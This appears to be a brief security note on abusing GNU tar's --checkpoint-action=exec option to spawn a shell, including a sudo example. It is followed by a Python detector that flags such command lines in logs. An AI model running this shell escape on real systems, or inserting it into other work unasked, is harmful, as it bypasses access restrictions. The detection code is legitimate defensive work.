Exploiting “tar”

author: Nathan Acks
date: 2021-11-02

Tar can be configured to execute an action for every N files processed using the --checkpoint and --checkpoint-action flags. So this will get us a shell:

tar -cf /dev/null /dev/null \
    --checkpoint=1 --checkpoint-action=exec=/bin/sh

This works with any input/output file (not just /dev/null), and with any executable binary (such as a reverse shell).
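
A defensive counterpart, added here as an example and not part of the original note: a check that flags logged tar command lines carrying a checkpoint exec action. The function names and sample command lines are constructed for illustration, and the input is assumed to be one full command line per string (for instance from process-execution audit logs).

```python
import os
import shlex

TAR_NAMES = {"tar", "gtar"}   # assumption: names GNU tar is installed under
OPTION = "--checkpoint-action"
STEM = "--checkpoint-"        # shortest stem unique to --checkpoint-action

# Constructed sample command lines; the first is the one from the note above.
SAMPLES = [
    "tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh",
    "sudo /usr/bin/tar -czf /tmp/etc.tgz /etc --checkpoint=1 --checkpoint-action exec=/bin/sh",
    "tar -czf /backup/home.tgz /home --checkpoint=1000 --checkpoint-action=dot",
    "tar -xf release.tar.gz -C /opt/app",
]

def checkpoint_exec_target(cmdline):
    """Return the command a tar invocation would run through a checkpoint
    exec action, or None if the command line carries no such action."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:        # unbalanced quotes in the logged line
        argv = cmdline.split()
    # Locate tar itself so that wrappers such as sudo or env are skipped.
    start = next((i for i, a in enumerate(argv)
                  if os.path.basename(a) in TAR_NAMES), None)
    if start is None:
        return None
    args = argv[start + 1:]
    for i, arg in enumerate(args):
        if arg == "--":       # end of options; what follows are file names
            break
        name, sep, value = arg.partition("=")
        # GNU long options are accepted in any unambiguous abbreviated form,
        # so match on the stem instead of the full option name only.
        if not (name.startswith(STEM) and OPTION.startswith(name)):
            continue
        if not sep:           # value passed as the following argument
            value = args[i + 1] if i + 1 < len(args) else ""
        if value.startswith("exec="):
            return value[len("exec="):]
    return None

def scan(lines):
    """Return (command line, exec target) pairs for every flagged line."""
    hits = ((line, checkpoint_exec_target(line)) for line in lines)
    return [(line, target) for line, target in hits if target is not None]

if __name__ == "__main__":
    for line, target in scan(SAMPLES):
        print(f"ALERT tar checkpoint exec -> {target!r}: {line}")
```

Other checkpoint actions such as dot are left unflagged, so progress reporting in ordinary backup jobs does not raise alerts.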